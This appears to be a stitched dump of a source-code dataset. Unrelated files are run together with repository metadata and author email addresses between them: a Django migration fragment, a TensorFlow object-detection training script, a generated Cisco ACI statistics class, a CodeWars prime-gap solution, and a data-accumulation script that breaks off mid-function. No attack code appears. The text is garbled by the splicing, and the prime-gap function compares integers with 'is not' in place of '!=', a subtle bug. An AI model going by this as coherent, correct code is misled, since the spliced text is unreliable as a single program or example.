'item': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userfeeditems'", 'to': u"orm['raven.FeedItem']"}),
'read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'starred': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userfeeditems'", 'to': u"orm['usher.User']"})
},
u'taggit.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
u'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_items'", 'to': u"orm['taggit.Tag']"})
},
u'usher.user': {
'Meta': {'object_name': 'User'},
'credential': ('oauth2client.django_orm.CredentialsField', [], {'null': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254', 'db_index': 'True'}),
'flow': ('oauth2client.django_orm.FlowField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_task_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '254'})
}
}
complete_apps = ['raven'] | [
"alex@chizang.net"
] | alex@chizang.net |
cdb5305e2659c879558f942f3a20592135fbf94c | 27833d78d12746f94af6210a72a7068a7f91e8a4 | /chapter05/s_chapter02/train.py | 30229bb1bd6ac75d11dab98301f35f2b219ab739 | [] | no_license | WuMenghao/DeepLearningDemo | 441b0aedcb07b26ab94c34c0ee026e782514c481 | 3689c50dabfe41e6fd6b1560522704664d0f2e92 | refs/heads/master | 2023-04-05T17:44:37.954880 | 2020-01-06T05:46:07 | 2020-01-06T05:46:07 | 218,517,640 | 0 | 0 | null | 2023-03-24T21:54:28 | 2019-10-30T12:01:13 | Python | UTF-8 | Python | false | false | 7,285 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Training executable for detection models.
This executable is used to train DetectionModels. There are two ways of
configuring the training job:
1) A single pipeline_pb2.TrainEvalPipelineConfig configuration file
can be specified by --pipeline_config_path.
Example usage:
./train \
--logtostderr \
--train_dir=path/to/train_dir \
--pipeline_config_path=pipeline_config.pbtxt
2) Three configuration files can be provided: a model_pb2.DetectionModel
configuration file to define what type of DetectionModel is being trained, an
input_reader_pb2.InputReader file to specify what training data will be used and
a train_pb2.TrainConfig file to configure training parameters.
Example usage:
./train \
--logtostderr \
--train_dir=path/to/train_dir \
--model_config_path=model_config.pbtxt \
--train_config_path=train_config.pbtxt \
--input_config_path=train_input_config.pbtxt
"""
import functools
import json
import os
import tensorflow as tf
from google.protobuf import text_format
import trainer
from object_detection.builders import input_reader_builder
from object_detection.builders import model_builder
from object_detection.protos import input_reader_pb2
from object_detection.protos import model_pb2
from object_detection.protos import pipeline_pb2
from object_detection.protos import train_pb2
tf.logging.set_verbosity(tf.logging.INFO)
flags = tf.app.flags
flags.DEFINE_string('master', '', 'BNS name of the TensorFlow master to use.')
flags.DEFINE_integer('task', 0, 'task id')
flags.DEFINE_integer('num_clones', 1, 'Number of clones to deploy per worker.')
flags.DEFINE_boolean('clone_on_cpu', False,
'Force clones to be deployed on CPU. Note that even if '
'set to False (allowing ops to run on gpu), some ops may '
'still be run on the CPU if they have no GPU kernel.')
flags.DEFINE_integer('worker_replicas', 1, 'Number of worker+trainer '
'replicas.')
flags.DEFINE_integer('ps_tasks', 0,
'Number of parameter server tasks. If None, does not use '
'a parameter server.')
flags.DEFINE_string('train_dir', '',
'Directory to save the checkpoints and training summaries.')
flags.DEFINE_string('pipeline_config_path', '',
'Path to a pipeline_pb2.TrainEvalPipelineConfig config '
'file. If provided, other configs are ignored')
flags.DEFINE_string('train_config_path', '',
'Path to a train_pb2.TrainConfig config file.')
flags.DEFINE_string('input_config_path', '',
'Path to an input_reader_pb2.InputReader config file.')
flags.DEFINE_string('model_config_path', '',
'Path to a model_pb2.DetectionModel config file.')
FLAGS = flags.FLAGS
def get_configs_from_pipeline_file():
"""Reads training configuration from a pipeline_pb2.TrainEvalPipelineConfig.
Reads training config from file specified by pipeline_config_path flag.
Returns:
model_config: model_pb2.DetectionModel
train_config: train_pb2.TrainConfig
input_config: input_reader_pb2.InputReader
"""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
with tf.gfile.GFile(FLAGS.pipeline_config_path, 'r') as f:
text_format.Merge(f.read(), pipeline_config)
model_config = pipeline_config.model
train_config = pipeline_config.train_config
input_config = pipeline_config.train_input_reader
return model_config, train_config, input_config
def get_configs_from_multiple_files():
"""Reads training configuration from multiple config files.
Reads the training config from the following files:
model_config: Read from --model_config_path
train_config: Read from --train_config_path
input_config: Read from --input_config_path
Returns:
model_config: model_pb2.DetectionModel
train_config: train_pb2.TrainConfig
input_config: input_reader_pb2.InputReader
"""
train_config = train_pb2.TrainConfig()
with tf.gfile.GFile(FLAGS.train_config_path, 'r') as f:
text_format.Merge(f.read(), train_config)
model_config = model_pb2.DetectionModel()
with tf.gfile.GFile(FLAGS.model_config_path, 'r') as f:
text_format.Merge(f.read(), model_config)
input_config = input_reader_pb2.InputReader()
with tf.gfile.GFile(FLAGS.input_config_path, 'r') as f:
text_format.Merge(f.read(), input_config)
return model_config, train_config, input_config
def main(_):
assert FLAGS.train_dir, '`train_dir` is missing.'
if FLAGS.pipeline_config_path:
model_config, train_config, input_config = get_configs_from_pipeline_file()
else:
model_config, train_config, input_config = get_configs_from_multiple_files()
model_fn = functools.partial(
model_builder.build,
model_config=model_config,
is_training=True)
create_input_dict_fn = functools.partial(
input_reader_builder.build, input_config)
env = json.loads(os.environ.get('TF_CONFIG', '{}'))
cluster_data = env.get('cluster', None)
cluster = tf.train.ClusterSpec(cluster_data) if cluster_data else None
task_data = env.get('task', None) or {'type': 'master', 'index': 0}
task_info = type('TaskSpec', (object,), task_data)
# Parameters for a single worker.
ps_tasks = 0
worker_replicas = 1
worker_job_name = 'lonely_worker'
task = 0
is_chief = True
master = ''
if cluster_data and 'worker' in cluster_data:
# Number of total worker replicas include "worker"s and the "master".
worker_replicas = len(cluster_data['worker']) + 1
if cluster_data and 'ps' in cluster_data:
ps_tasks = len(cluster_data['ps'])
if worker_replicas > 1 and ps_tasks < 1:
raise ValueError('At least 1 ps task is needed for distributed training.')
if worker_replicas >= 1 and ps_tasks > 0:
# Set up distributed training.
server = tf.train.Server(tf.train.ClusterSpec(cluster), protocol='grpc',
job_name=task_info.type,
task_index=task_info.index)
if task_info.type == 'ps':
server.join()
return
worker_job_name = '%s/task:%d' % (task_info.type, task_info.index)
task = task_info.index
is_chief = (task_info.type == 'master')
master = server.target
trainer.train(create_input_dict_fn, model_fn, train_config, master, task,
FLAGS.num_clones, worker_replicas, FLAGS.clone_on_cpu, ps_tasks,
worker_job_name, is_chief, FLAGS.train_dir)
if __name__ == '__main__':
tf.app.run()
| [
"tm_wmh@foxmail.com"
] | tm_wmh@foxmail.com |
e6cb1c6ae8c2f5f50118d4848598853900007fbf | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/eqptcapacity/l3remoteusageper1year.py | 9f5ceefbfc23a4350dd913a6766bce7204c280e9 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 19,817 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class L3RemoteUsagePer1year(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.eqptcapacity.L3RemoteUsagePer1year", "Layer3 remote entries usage percentage")
counter = CounterMeta("normalizedRemotev6", CounterCategory.GAUGE, "percentage", "Remote v6 L3 entries usage percentage")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "normalizedRemotev6Last"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "normalizedRemotev6Min"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "normalizedRemotev6Max"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "normalizedRemotev6Avg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "normalizedRemotev6Spct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "normalizedRemotev6Ttl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "normalizedRemotev6Thr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "normalizedRemotev6TrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "normalizedRemotev6Tr"
meta._counters.append(counter)
counter = CounterMeta("normalizedRemotev4", CounterCategory.GAUGE, "percentage", "Remote v4 L3 entries usage percentage")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "normalizedRemotev4Last"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "normalizedRemotev4Min"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "normalizedRemotev4Max"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "normalizedRemotev4Avg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "normalizedRemotev4Spct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "normalizedRemotev4Ttl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "normalizedRemotev4Thr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "normalizedRemotev4TrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "normalizedRemotev4Tr"
meta._counters.append(counter)
meta.moClassName = "eqptcapacityL3RemoteUsagePer1year"
meta.rnFormat = "CDeqptcapacityL3RemoteUsagePer1year"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current Layer3 remote entries usage percentage stats in 1 year"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.eqptcapacity.Entity")
meta.superClasses.add("cobra.model.eqptcapacity.L3RemoteUsagePer")
meta.superClasses.add("cobra.model.stats.Curr")
meta.superClasses.add("cobra.model.stats.Item")
meta.rnPrefixes = [
('CDeqptcapacityL3RemoteUsagePer1year', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "normalizedRemotev4Avg", "normalizedRemotev4Avg", 36635, PropCategory.IMPLICIT_AVG)
prop.label = "Remote v4 L3 entries usage percentage average value"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev4Avg", prop)
prop = PropMeta("str", "normalizedRemotev4Last", "normalizedRemotev4Last", 36632, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Remote v4 L3 entries usage percentage current value"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev4Last", prop)
prop = PropMeta("str", "normalizedRemotev4Max", "normalizedRemotev4Max", 36634, PropCategory.IMPLICIT_MAX)
prop.label = "Remote v4 L3 entries usage percentage maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev4Max", prop)
prop = PropMeta("str", "normalizedRemotev4Min", "normalizedRemotev4Min", 36633, PropCategory.IMPLICIT_MIN)
prop.label = "Remote v4 L3 entries usage percentage minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev4Min", prop)
prop = PropMeta("str", "normalizedRemotev4Spct", "normalizedRemotev4Spct", 36636, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Remote v4 L3 entries usage percentage suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev4Spct", prop)
prop = PropMeta("str", "normalizedRemotev4Thr", "normalizedRemotev4Thr", 36638, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Remote v4 L3 entries usage percentage thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("normalizedRemotev4Thr", prop)
prop = PropMeta("str", "normalizedRemotev4Tr", "normalizedRemotev4Tr", 36640, PropCategory.IMPLICIT_TREND)
prop.label = "Remote v4 L3 entries usage percentage trend"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev4Tr", prop)
prop = PropMeta("str", "normalizedRemotev4TrBase", "normalizedRemotev4TrBase", 36639, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Remote v4 L3 entries usage percentage trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev4TrBase", prop)
prop = PropMeta("str", "normalizedRemotev4Ttl", "normalizedRemotev4Ttl", 36637, PropCategory.IMPLICIT_TOTAL)
prop.label = "Remote v4 L3 entries usage percentage total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev4Ttl", prop)
prop = PropMeta("str", "normalizedRemotev6Avg", "normalizedRemotev6Avg", 36650, PropCategory.IMPLICIT_AVG)
prop.label = "Remote v6 L3 entries usage percentage average value"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev6Avg", prop)
prop = PropMeta("str", "normalizedRemotev6Last", "normalizedRemotev6Last", 36647, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Remote v6 L3 entries usage percentage current value"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev6Last", prop)
prop = PropMeta("str", "normalizedRemotev6Max", "normalizedRemotev6Max", 36649, PropCategory.IMPLICIT_MAX)
prop.label = "Remote v6 L3 entries usage percentage maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev6Max", prop)
prop = PropMeta("str", "normalizedRemotev6Min", "normalizedRemotev6Min", 36648, PropCategory.IMPLICIT_MIN)
prop.label = "Remote v6 L3 entries usage percentage minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev6Min", prop)
prop = PropMeta("str", "normalizedRemotev6Spct", "normalizedRemotev6Spct", 36651, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Remote v6 L3 entries usage percentage suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev6Spct", prop)
prop = PropMeta("str", "normalizedRemotev6Thr", "normalizedRemotev6Thr", 36653, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Remote v6 L3 entries usage percentage thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("normalizedRemotev6Thr", prop)
prop = PropMeta("str", "normalizedRemotev6Tr", "normalizedRemotev6Tr", 36655, PropCategory.IMPLICIT_TREND)
prop.label = "Remote v6 L3 entries usage percentage trend"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev6Tr", prop)
prop = PropMeta("str", "normalizedRemotev6TrBase", "normalizedRemotev6TrBase", 36654, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Remote v6 L3 entries usage percentage trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev6TrBase", prop)
prop = PropMeta("str", "normalizedRemotev6Ttl", "normalizedRemotev6Ttl", 36652, PropCategory.IMPLICIT_TOTAL)
prop.label = "Remote v6 L3 entries usage percentage total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("normalizedRemotev6Ttl", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
6ad851cbcd18f3f09636edf8d5926440492921f1 | 56b5bce8ad3d778ab5a6665f49fe920b14c6ba76 | /Python/prime_gap.py | 21fb8a52808a5e371839bfa1be251c3abec13f8f | [] | no_license | oversj96/CodeWarsProjects | aeef268f1eb88856b2f3479fe1f0925b76251569 | f3bd33484c65131b158c931db3deced72901ba6a | refs/heads/master | 2020-07-19T05:44:29.043957 | 2019-09-13T16:12:14 | 2019-09-13T16:12:14 | 206,385,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | def gap(g, m, n):
if(m % 2 == 0):
m += 1
for i in range(m, n+1, 2):
for x in range(2, i+1):
if(i % x == 0 and i is not x):
break
elif(i == x):
for j in range(i, i+g+1):
for y in range(2, j+1):
if(j % y == 0 and j is not y):
break
elif(j == i+g):
return [i, j]
return None
print (gap(4,100,110)) | [
"45669103+oversj96@users.noreply.github.com"
] | 45669103+oversj96@users.noreply.github.com |
b7615ccb5fb53b5adb5e8d5f5076d4dcafddc37d | 53d1bdf15ac38f23785dc2d12438300a3c4420ef | /tools/accumulate.py | d0a5579de0f8e672b28ffa6d78d9dc57af54bdcf | [] | no_license | sbmaruf/Parallel-data-ted | c69273814b3584544207b681445aba3e1dc2e629 | 4f19ec96042d0b0831a7134bd2385cd7276a2536 | refs/heads/master | 2021-04-09T11:23:54.630315 | 2018-07-05T08:36:48 | 2018-07-05T08:36:48 | 124,411,201 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,579 | py | import os
import argparse
import time
import sys
from collections import OrderedDict
import re
import unicodedata
parser = argparse.ArgumentParser(
description="Accumulate different source of data",
prog=((sys.argv[2] + '.py') if os.path.basename(sys.argv[0]) == 'pydoc' else sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("--src_lang",
type=str,
default="en",
help="short identifier of the source language. ex: en")
parser.add_argument("--tgt_lang",
type=str,
default="ms",
help="short identifier of the target language. ex: ms")
parser.add_argument("--dir",
type=str,
default="./en-ms/",
help="folder address where the data files exists. data file pattern:"
" file_name.lang1-lang2.selected_lang. ex: amara.en-ms.en")
parser.add_argument("--out_dir",
type=str,
default="./nmt_io/",
help="folder address where the data files will be saved.")
parser.add_argument("--parallel_file",
type=int,
default=1,
help="if the parallel lines will be saved in same file or not."
"condition for parallel_file == 0 is not implemented in the script")
parser.add_argument("--debug",
type=int,
default=1,
help="if the parallel lines will be saved in same file or not.")
parser.add_argument("--restrict",
type=str,
default="",
help="if the parallel lines will be saved in same file or not.")
parser.add_argument("--verbose",
type=int,
default=2,
help="printing additional information."
"verbose = 2 : show the details step of folder creation."
"verbose = 1 : Additional information printing.")
def retrieve_file_dict(_all_files, src_lang, tgt_lang):
"""
retrieve the filename form a nmt based naming files.
example:
input : gnome.en-ms.en
output : gnome
:param _all_files: the nmt bas named file in a list.
:param src_lang: the src_language short form.
:param tgt_lang: the tgt_language short form.
:return: a dictionary(OrderedDict) of file names, and the output_file_name in string
"""
search_str = '.' + src_lang + '-' + tgt_lang
src_search_str = search_str + '.' + src_lang
tgt_search_str = search_str + '.' + tgt_lang
